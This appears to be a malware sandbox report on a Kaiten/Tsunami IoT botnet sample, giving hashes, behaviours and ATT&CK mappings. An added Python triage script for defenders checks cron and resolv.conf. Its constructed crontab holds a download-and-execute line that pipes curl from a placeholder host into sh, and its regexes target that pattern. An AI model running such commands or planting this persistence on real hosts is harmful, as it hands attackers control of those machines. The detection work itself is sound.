General

  • Target

    fa856be9e8018c3a7d4d2351398192d8

  • Size

    40KB

  • Sample

    231222-vjshfadee6

  • MD5

    fa856be9e8018c3a7d4d2351398192d8

  • SHA1

    2bb922f78643a91cf4983482fd2f85d25f1a7073

  • SHA256

    8b929fa993b6eb2bb37281fd265c19c862c4124c770e7c99ce5997a667d0e11b

  • SHA512

    a285f2a0e342d7d8c6fdaf27e6e595707da183e7f793b5a94a714cf7c9cc9e05492e32178479eeaddf740625e568373f1c1069a709fd914bc65fe1f0a1fad1d2

  • SSDEEP

    768:0g8NC9SEia11gVCLI++yrmO2pSEVChObouBkvYwxE3RSinbcuyD7UncG/Hpa0kTb:0g8NC9SENHLIdkmO2pSRhPuBkvYr3Mim

Malware Config

Targets

    • Detects Kaiten/Tsunami Payload

    • Kaiten/Tsunami

      Linux-based IoT botnet family whose bots are controlled through IRC and are normally used to carry out DDoS attacks.

    • Writes DNS configuration

      Writes to the DNS resolver configuration file (/etc/resolv.conf on a Linux host), changing which nameservers the system queries.

    • Creates/modifies Cron job

      Cron runs tasks on a schedule and is commonly abused for malware persistence (Scheduled Task/Job, T1053).

    • Enumerates running processes

      Discovers information about the processes currently running on the system.
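
The "Creates/modifies Cron job" and "Writes DNS configuration" behaviours above are the two a responder can check for directly on a suspect Linux host. The script below is an added example, not part of this sandbox report: it hashes files against the sample's SHA256 from the report, flags crontab entries that look like persistence (execution from /tmp, /dev/shm or /var/tmp, download-and-execute one-liners, @reboot hooks), and lists resolv.conf nameservers that are not on an allow-list. The crontab and resolv.conf contents, the 203.0.113.x/192.0.2.x/198.51.100.x addresses and the heuristic patterns are all constructed for the example and should be tuned per fleet.

```python
#!/usr/bin/env python3
"""Host-side triage for the cron-persistence and resolv.conf behaviours in the report.

Added example, not code from the sandbox report. The sample data below is
CONSTRUCTED so the script runs offline; on a real host read the actual files.
"""
from __future__ import annotations

import hashlib
import re

# IOC taken from the report: SHA256 of the 40KB sample.
KNOWN_BAD_SHA256 = {
    "8b929fa993b6eb2bb37281fd265c19c862c4124c770e7c99ce5997a667d0e11b",
}

# Assumed heuristics for cron persistence; adjust for your environment.
SUSPICIOUS_CRON = [
    re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/"),      # runs something from a temp dir
    re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b"),  # download-and-execute one-liner
    re.compile(r"^@reboot"),                            # runs at boot, no schedule
]

# Constructed crontab: one benign entry, two that should be flagged.
CONSTRUCTED_CRONTAB = """\
# m h dom mon dow command
*/5 * * * * /tmp/.x/update
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
@reboot curl -s http://203.0.113.5/a | sh
"""

# Constructed resolv.conf: the second nameserver is not on the allow-list.
CONSTRUCTED_RESOLV_CONF = """\
# generated for this example
nameserver 192.0.2.53
nameserver 198.51.100.1
search lan
"""
ALLOWED_NAMESERVERS = {"192.0.2.53"}  # assumed: the resolvers your fleet should use


def sha256_matches(data: bytes) -> bool:
    """Return True if the SHA256 of data is in the IOC set."""
    return hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256


def suspicious_cron_lines(crontab_text: str) -> list[str]:
    """Return crontab entries matching any persistence heuristic; comments and blanks are skipped."""
    hits = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if any(p.search(stripped) for p in SUSPICIOUS_CRON):
            hits.append(stripped)
    return hits


def rogue_nameservers(resolv_conf: str, allowed: set[str]) -> list[str]:
    """Return nameserver addresses in resolv.conf text that are not on the allow-list."""
    rogue = []
    for line in resolv_conf.splitlines():
        m = re.match(r"^\s*nameserver\s+(\S+)", line)
        if m and m.group(1) not in allowed:
            rogue.append(m.group(1))
    return rogue


def triage(crontab_text: str, resolv_text: str, file_blobs: dict[str, bytes]) -> dict:
    """Run all three checks and return the findings as a dict."""
    return {
        "ioc_hash_hits": [name for name, data in file_blobs.items() if sha256_matches(data)],
        "suspicious_cron": suspicious_cron_lines(crontab_text),
        "rogue_nameservers": rogue_nameservers(resolv_text, ALLOWED_NAMESERVERS),
    }


if __name__ == "__main__":
    # The file content here is a placeholder, not the sample, so the hash check will not hit.
    findings = triage(
        CONSTRUCTED_CRONTAB,
        CONSTRUCTED_RESOLV_CONF,
        {"/tmp/.x/update": b"placeholder bytes, not the sample"},
    )
    for key, value in findings.items():
        print(f"{key}: {value}")
```

On a live host, replace the constructed strings with the output of `crontab -l` for each user plus the files under /etc/cron.d and /etc/cron.*/, and read /etc/resolv.conf directly; a hash hit on the report's SHA256 confirms this exact sample, while the cron and resolver checks catch the behaviour even when the binary has been repacked.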

MITRE ATT&CK Matrix (ATT&CK v13)

  Tactic                 Technique               ID      Matches
  Execution              Scheduled Task/Job      T1053   1
  Persistence            Scheduled Task/Job      T1053   1
  Privilege Escalation   Scheduled Task/Job      T1053   1
  Command and Control    Dynamic Resolution      T1568   1

Tasks